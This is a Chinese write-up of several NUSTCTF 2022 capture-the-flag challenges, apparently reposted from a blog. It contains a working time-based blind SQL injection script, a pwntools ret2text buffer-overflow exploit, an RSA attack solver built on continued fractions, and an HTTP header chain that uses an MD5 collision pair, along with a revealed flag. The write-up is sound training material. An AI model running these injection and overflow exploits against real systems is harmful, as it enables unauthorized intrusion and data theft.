题目复现环境:
https://www.ctfer.vip/contest/62/
欢迎加QQ群,一起做题和共享解题思路: 936250507
http://47.103.60.98/
访问时,提供了一个”查询”按钮。点击,进入查询结果页面。
http://47.103.60.98/index.php?sort=desc
id: 2 - 姓名: Bob - 籍贯: 江苏无锡
id: 4 - 姓名: Tom - 籍贯: 江苏常州
id: 1 - 姓名: Alice - 籍贯: 江苏南京
id: 5 - 姓名: Mary - 籍贯: 江苏南京
id: 6 - 姓名: Allen - 籍贯: 江苏南京
发现链接末尾是desc,猜测是order by xx desc这样的查询语句。
FUZZ一下SQL关键字,过滤的关键字不多。
过滤的有:空格
经尝试,发现存在基于时间的SQL注入漏洞。exp脚本如下:
import requests
burp0_url = "http://47.103.60.98/index.php?sort="
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
}
all_print_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;?@[\]^_`{|}~"
query_str = ''
for length in range(1, 40):
print(length,end='')
for char in all_print_str:
payload = "desc,if(ascii(mid((select/**/group_concat(name,position)/**/from/**/position/**/where/**/id=3),{0},1))={1},sleep(1),0)#".format(length, ord(char))
resp = requests.get(burp0_url+payload, headers=burp0_headers)
if resp.elapsed.total_seconds() > 1:
query_str += char
print(query_str)
else:
continue
64位程序,先IDA逆向分析源代码:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[10];
setbuf(_bss_start, 0LL);
puts("Your name plz:");
gets(v4);
if ( v4[0] % 233 == 233 )
system("cat flag");
printf("Can you hack me? %s\n", v4);
return 0;
}
gets存在栈溢出漏洞,可修改返回地址至 system("cat flag") 代码处,ret2text。
exp:
from pwn import *
context.log_level = 'debug'
io = remote("43.143.7.97", 28859)
sys_addr = 0x401229
pl1 = b'A'*(10+8) + p64(sys_addr)
io.sendlineafter(b"Your name plz:",pl1)
io.interactive()
chall.py
from Crypto.Util.number import getPrime, bytes_to_long
from sympy import nextprime
from secret import flag
p1 = getPrime(2048)
q1 = getPrime(600)
p2 = nextprime(p1 + getPrime(600))
q2 = getPrime(600)
e = 0x10001
N1 = p1 * p1 * q1
N2 = p2 * p2 * q2
print("N1 =", N1)
print("N2 =", N2)
flag1 = bytes_to_long(flag[:len(flag) // 2])
flag2 = bytes_to_long(flag[len(flag) // 2:])
cipher1 = pow(flag1, e, N1)
cipher2 = pow(flag2, e, N2)
print("cipher1 =", cipher1)
print("cipher2 =", cipher2)
连分数求出q1, q2,即可进一步求出p1, p2。
from Crypto.Util.number import *
from gmpy2 import *
N1 = 3289746385054724131365721020639496300945479666755005407239362220435929471663971559131973068094267242759747682915202602265269024546168034070348080432976135403371083936361236868186476392365554734516698695915807318328547349333450125215426536032220967810893464208090339137598724593917266763998037725309967496052803477931961681761135080900299333158097292389350335121611775110493009954911832572636099153354952171029044016319029661601727739828271424563980850243898202779669776639104067478441675153857040164775196713586656673764171877161326751846236980454659960530174960321852298270258312146241360929350418220172331956030775384681767932014061291168620965347842124549316096247113770711834360498936747471888481237404034471246978342020816271785925362208839937490625070051801028223342083281773366267363149243726101075926327550718757413133631119649782144511080448476370411156544146278468602957599519708203511203435394861053372096309444985117323976240925612725880016576029876493825989064619463226166401883310383733295274652092903872304933657343307118616812213637906513530016004460475073291823916649597185291734261926576108675712303422832460766980003743958182130150811173621769221262799069912858162405156365709344847558244669016188305691537672753134766406649385330682157984720023661279153645005631349488537261911860571171672813544726579872640486753312665928030263533489558821140031095492111373847722540582741061909831250761476687
N2 = 2292263744571677490370198515319050673022350367021940229132415885393214523108231545410288799524823682686607005535541881885794949322622162858593875970155712564868530006799557973311000615581843236548539733075504282834631939435260232339940338468890310925405870533590386398071667718507612723307978025099102004513584485422609923041107028535400446355591432930994813185411831860201820145983435091523773691560011687528125877698679841462745728326159525372061320952493949821495222248383893254880735838359120880431072244214361010867779059178282739912365087421904643477215607290679708352033106358356290644004853543174075195107627794359272018100648168661860452919746052205404895413998960327066611970768862624073581670828267510841602161728589913841163473811894218339948715205301321356774629578043062238684103507006315521103670400509643518854842374093509082331379305822049420033746124157212615698602544129110388591266923967512746018551734391176602223771675279723873630468099034521371667295520830509224068753383327420799595674898227670628881521095495898465890256628288779785408613688721508315026743250146090703141554141208186588758560579281631449476819201739513661261100456398775274335050320480934180632543242116316388750179657345282978014879818574111951053767465935985181195234991374892341383106554664200986728169474150302232887629401491764905429656980077385228539526682528035467486946883267941678859904770170914569949948781798383
c1 = 758346536265430423952822486066685295768780904671958564513706915003627653309986327906604310025557676880130150973194443591153899441660221125085406078577489990064034099758898680250346992154199616929381594288918352701155172644054184374384778201304104144436102359709180739955762513436889301607686277088230852661148556440251553059814853050711377102806879036793210874472411397851504602916797481132018776755416068149801594219844674499351889997208649442043923826505239289470153001663639688739092310857881616013610569511757767780350165048282465256454770748877584119349207769812826840607665168961680724232789109312681055375411182858820698025923104994832566402422884359019460479145829812817446509615552819113705033128233093081687704471007797878802184788802106948491309583791881593217988561342681568377126606055476508381741342859362339824940846336741346126512500348868154174463810299929429409815515908136711497765026252563374327541491024303290989175383501994515761077240391195396083766760326143468930305986070405962303571534654392917816088220966950447926277802817335097304148972911332832248113849846752219065263639980629213197260594242031101803801865240157341309018859709063723920616432168289755151080828619642932516426139982777613526680161145782566883722320235485389839997229666979487071672091138823743231576011381309205283462045931376953038071401274899229258796970036565931730655471667545203734032609058125128632555918726761
c2 = 2281163375114595112593683220870779643793045914138930809669934728297504812745368657964524831965320392164027435706363680996214578180045485041532876049868691323690200562004954003143194397255512951717400899604307009993030792644670830602941543918898535970779253703220162651022293286208338299826844988619345629892007235258389532666376623514170628541968337364745860334903754371727427376399211310359996960626733244649671665175464666807399652951289553389561033148215888827057495743582318390507639029065358587166019110069479019692411629179363742708597061223484237748437654542910240974030049076975739481960903748359283570086571360417832776823264202688497555419017227144724790205424467059280453940666789219388347170532415234759731375390229140544207931837445265744016932142504371200121886182154284965893665022781184321216382767703694597553489507371271887593799060901908513758134472760311502510753557029741715193386673389466599068008750012915225818076301655694045130332321314233483042503950958442501013310465239137942770667655164906193219286435485452257047415797293472629254376873962168035382262951696816840667369861437088409243033239980128747965838367176274122593955221422537124546203553941387134587884149412499272660959871746858550851448840531698152805786123875121854564754397297726121984646669253047201515221545545683432754661774694401343486893270795112334494874407955432598253951220055000392855162417030953645428808146502304
e = 0x10001
def continuedFra(x, y):
cF = []
while y:
cF += [x // y]
x, y = y, x % y
return cF
def Simplify(ctnf):
numerator = 0
denominator = 1
for x in ctnf[::-1]:
numerator, denominator = denominator, x * denominator + numerator
return (numerator, denominator)
def getit(c):
cf=[]
for i in range(1,len(c)):
cf.append(Simplify(c[:i]))
return cf
def wienerAttack(n1, n2):
cf=continuedFra(n1,n2)
for (p2,p1) in getit(cf):
if p1 == 0:
continue
if n1%p1==0 and p1!=1:
return p1,p2
q1,q2 = wienerAttack(N1,N2)
print(isPrime(q1))
print(isPrime(q2))
print(q1,q2)
print(q1.bit_length())
print(q2.bit_length())
p1,f = iroot(N1//q1, 2)
p2,f = iroot(N2//q2, 2)
print(isPrime(p1))
print(isPrime(p2))
d1 = inverse(e, p1*(p1-1)*(q1-1))
d2 = inverse(e, p2*(p2-1)*(q2-1))
m1 = pow(c1, d1, N1)
m2 = pow(c2, d2, N2)
print(long_to_bytes(m1).decode(), end='')
print(long_to_bytes(m2).decode())
来检验一下你的WEB基础知识吧
这题检测HTTP协议。使用Yakit的Web Fuzzer发包:
GET / HTTP/1.1
Host: 43.143.7.97:28086
-->
You must come from 127.0.0.1
加一个XFF头:
GET / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
-->
Have you just visited http://localhost/?
再加一个Referer:
GET / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
-->
You must use POST
改GET方法为POST方法:
--> Your posted username must be admin
再添加POST的数据:
POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
username=admin
--> Your posted p1 and p2 must be different but have the same md5
md5强碰撞绕过。
POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
Set-Cookie: dinner=diet%20menu
I don' want to follow diet menu anymore, I want to have a big meal
添加Cookie:
POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Cookie: dinner=big%20meal
username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
-->
Oh, I'm satisfied, and this is your flag: NSSCTF{b62ea40a-37de-4437-b7d3-5da72bf44b00}
Original: https://blog.csdn.net/rickliuxiao/article/details/127826580
Author: jia9iniu
Title: # NUSTCTF(校外赛道)2022-wp
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/661259/
转载文章受原作者版权保护。转载请注明原作者出处!